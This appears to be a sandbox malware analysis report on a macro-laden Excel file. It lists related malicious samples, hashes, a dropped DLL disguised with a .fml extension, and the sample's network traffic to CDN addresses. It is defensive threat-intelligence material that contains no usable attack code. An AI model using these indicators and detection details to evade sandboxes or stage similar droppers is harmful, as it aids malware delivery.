	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	104.21.55.83
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	104.21.55.83
	PI-210610.xlsm	Get hash	malicious	Browse	104.21.55.83

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	HRcontacts7752205.xlsm	Get hash	malicious	Browse	172.67.194.117
	Formtofill4184860.xlsm	Get hash	malicious	Browse	172.67.194.117
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	104.21.12.122
	runsys32.dll	Get hash	malicious	Browse	104.20.185.68
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	172.67.194.117
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	172.67.194.117
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	172.67.194.117
	SMR8OzIgNB.exe	Get hash	malicious	Browse	104.21.8.151
	Follow up Purchase order num- 4500262450.exe	Get hash	malicious	Browse	104.21.75.42
	PI-210610.xlsm	Get hash	malicious	Browse	172.67.194.117
	2790000.dll	Get hash	malicious	Browse	104.20.185.68
	2770174.dll	Get hash	malicious	Browse	104.20.185.68
	Payment Invoice.exe	Get hash	malicious	Browse	172.67.188.154
	rial exe.exe	Get hash	malicious	Browse	104.21.19.200
	Quotation.exe	Get hash	malicious	Browse	104.21.19.200
	SCTc9qaix4.exe	Get hash	malicious	Browse	1.0.0.1
	AFS Co., Ltd..exe	Get hash	malicious	Browse	104.26.6.41
	q7p7x4f4gX.dll	Get hash	malicious	Browse	104.20.184.68
	XoN2GgRiga.exe	Get hash	malicious	Browse	104.23.99.190
	zeMISetSYn.exe	Get hash	malicious	Browse	172.67.188.154
AMAZON-02US	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.224.92.73
	Reciept 19129475.xlsb	Get hash	malicious	Browse	54.191.98.150
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.224.92.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.224.92.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.224.92.73
	PI-210610.xlsm	Get hash	malicious	Browse	143.204.4.74
	GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msi	Get hash	malicious	Browse	18.231.168.212
	39d0c1e7.msi	Get hash	malicious	Browse	3.143.159.48
	Movcy_v1.0.0.apk	Get hash	malicious	Browse	52.39.180.2
	order No. 00192099##001 pdf.exe	Get hash	malicious	Browse	3.143.65.214
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	143.204.91.74
	lZYIQJNUsZ.exe	Get hash	malicious	Browse	13.249.12.162
	q62NZgHtRq.exe	Get hash	malicious	Browse	3.22.53.161
	i	Get hash	malicious	Browse	52.9.197.152
	8zsiEeSTzI.exe	Get hash	malicious	Browse	52.217.140.209
	Request For Quotation.exe	Get hash	malicious	Browse	75.2.26.18
	pip install.yp.exe	Get hash	malicious	Browse	52.18.63.80
	Payment_Breakdown_pdf.exe	Get hash	malicious	Browse	52.58.78.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	HRcontacts7752205.xlsm	Get hash	malicious	Browse	13.225.75.73
	Formtofill4184860.xlsm	Get hash	malicious	Browse	13.225.75.73
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse	13.225.75.73
	Outfordelivery799862.xlsm	Get hash	malicious	Browse	13.225.75.73
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse	13.225.75.73
	DeliveryConf535215.xlsm	Get hash	malicious	Browse	13.225.75.73
	PI-210610.xlsm	Get hash	malicious	Browse	13.225.75.73
	108020075.exe	Get hash	malicious	Browse	13.225.75.73
	G-DECL G50 EURL.xlsx	Get hash	malicious	Browse	13.225.75.73
	1.doc	Get hash	malicious	Browse	13.225.75.73
	DECL G50 EURL!.xlsx	Get hash	malicious	Browse	13.225.75.73
	Order No. 211128.doc	Get hash	malicious	Browse	13.225.75.73
	SOA.xlsx	Get hash	malicious	Browse	13.225.75.73
	DECL G50 EURL.xlsx	Get hash	malicious	Browse	13.225.75.73
	WO 378871.xlsb	Get hash	malicious	Browse	13.225.75.73
	Order 824126.xlsb	Get hash	malicious	Browse	13.225.75.73
	WO 378871.xlsb	Get hash	malicious	Browse	13.225.75.73
	PO 31449213.xlsb	Get hash	malicious	Browse	13.225.75.73
	Order 161488.xlsb	Get hash	malicious	Browse	13.225.75.73
	Order 824126.xlsb	Get hash	malicious	Browse	13.225.75.73

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse
C:\Users\user\XTOWN.dll	HRcontacts7752205.xlsm	Get hash	malicious	Browse
	Formtofill4184860.xlsm	Get hash	malicious	Browse
	sbf0127365-7431059.xlsm	Get hash	malicious	Browse
	Outfordelivery799862.xlsm	Get hash	malicious	Browse
	Purchaseconfirmation-137606.xlsm	Get hash	malicious	Browse
	DeliveryConf535215.xlsm	Get hash	malicious	Browse
	PI-210610.xlsm	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D613D612.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	174009
Entropy (8bit):	7.967231122944825
Encrypted:	false
SSDEEP:	3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
MD5:	C0AF15BAE70AFFC4BE7625110AEEF09A
SHA1:	AEF94E038F0538C812AAF9EF605F76AF2376A26D
SHA-256:	D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
SHA-512:	131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................

C:\Users\user\Desktop\~$List-4527768.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\XTOWN.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32+ executable (DLL) (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.963425128586394
Encrypted:	false
SSDEEP:	768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5:	7A1D163990ACE9CEF1D43831866109AB
SHA1:	38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256:	2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512:	454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious:	true
Joe Sandbox View:	Filename: HRcontacts7752205.xlsm, Detection: malicious, Browse Filename: Formtofill4184860.xlsm, Detection: malicious, Browse Filename: sbf0127365-7431059.xlsm, Detection: malicious, Browse Filename: Outfordelivery799862.xlsm, Detection: malicious, Browse Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious, Browse Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse Filename: PI-210610.xlsm, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Excel 2007+
Entropy (8bit):	7.9394014867391105
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	List-4527768.xlsm
File size:	189905
MD5:	a4e97ce76c7a39ee9fa541a3c660a333
SHA1:	e3bb71833f604da1920424049ea0c15912a6a6b7
SHA256:	56b6de63e55ae6d81433f309af5b5d29ccfe7ec9d45c644572029256eb2c6e41
SHA512:	18ea5b3cd62f75749cf2d1f836a0673d73611bad72209bb75383e3846282a4a6fe1bc9e486bfaac94fa335b8359cf1197fc45eb173d1897e3ddf9a8a30433fe0
SSDEEP:	3072:+DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:cRcGUlFzy4mpTHdrUc3/SsYASx
File Content Preview:	PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 15:57:20.829122066 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:57:20.867321968 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 15:57:20.867427111 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:57:20.868705034 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:57:20.906771898 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 15:57:20.921128035 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 15:57:20.921160936 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 15:57:20.921227932 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:57:20.921268940 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:57:21.013004065 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.051266909 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.051357031 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.052625895 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.090886116 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111716986 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111763954 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111793995 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111799955 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111819029 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111825943 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111829996 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111850977 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111865044 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111876011 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111881018 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111901045 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111916065 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111924887 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111926079 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111949921 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111964941 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.111977100 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.111978054 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.112010956 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.112560034 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.112584114 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.112637043 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.113512039 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.113529921 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.113626003 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.114363909 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.114382029 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.114448071 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.115279913 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.115298986 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.115370035 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.116225004 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.116257906 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.116302013 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.116338968 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.117117882 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.117158890 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.117213011 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.117954016 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.117985010 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.118011951 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.118055105 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.118793964 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.118833065 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.118860960 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.118915081 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.118949890 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.119725943 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.119748116 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.119795084 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.119822025 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.120618105 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.120645046 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.120677948 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.120693922 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.121041059 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.121885061 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.150094032 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.150141954 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.150207043 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.150319099 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.150403976 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.150458097 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.150563002 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.150613070 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.151326895 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.151355982 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.151410103 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.152209044 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.152230024 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.152256012 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.152267933 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.152282000 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.153126955 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.153165102 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.153208017 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.154037952 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.154071093 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.154097080 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.154141903 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.154145956 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.154898882 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.154947996 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:57:21.154956102 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.154987097 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:57:21.237061977 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:57:21.275264978 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 15:57:21.275391102 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:57:21.276241064 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:57:21.315921068 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 15:57:21.337383986 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 15:57:21.337424040 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 15:57:21.337517023 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:57:22.527394056 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.567497015 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.567671061 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.578727961 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.619707108 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.620420933 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.620454073 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.620476007 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.620753050 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.622539997 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.622751951 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.622942924 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.640062094 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:22.679133892 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.679613113 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:22.876521111 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.146667957 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.186523914 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.319838047 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.319863081 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.319879055 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.319894075 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.320839882 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.320856094 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.321980000 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.321993113 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.324191093 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.324249029 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.324254036 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.324258089 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.406780005 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.406820059 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.407048941 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.407255888 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.407284975 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.407346964 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.408375978 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.408401966 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.408459902 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.409482002 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.409506083 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.410654068 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.410676003 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.411423922 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.411465883 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.411731958 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.411763906 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.411834955 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.412822962 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.412847996 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.412909031 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.494362116 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.494401932 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.494617939 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.494842052 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.494869947 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.494937897 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.495898962 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.495917082 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.496124029 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.497031927 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.497047901 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.497179031 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.498136997 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.498155117 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.498229980 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.499218941 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.499238014 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.499317884 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.500369072 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.500386000 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.500461102 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.501460075 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.501477003 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.501554012 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.502557039 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.502574921 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.502654076 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.503739119 CEST	443	49168	13.225.75.73	192.168.2.22
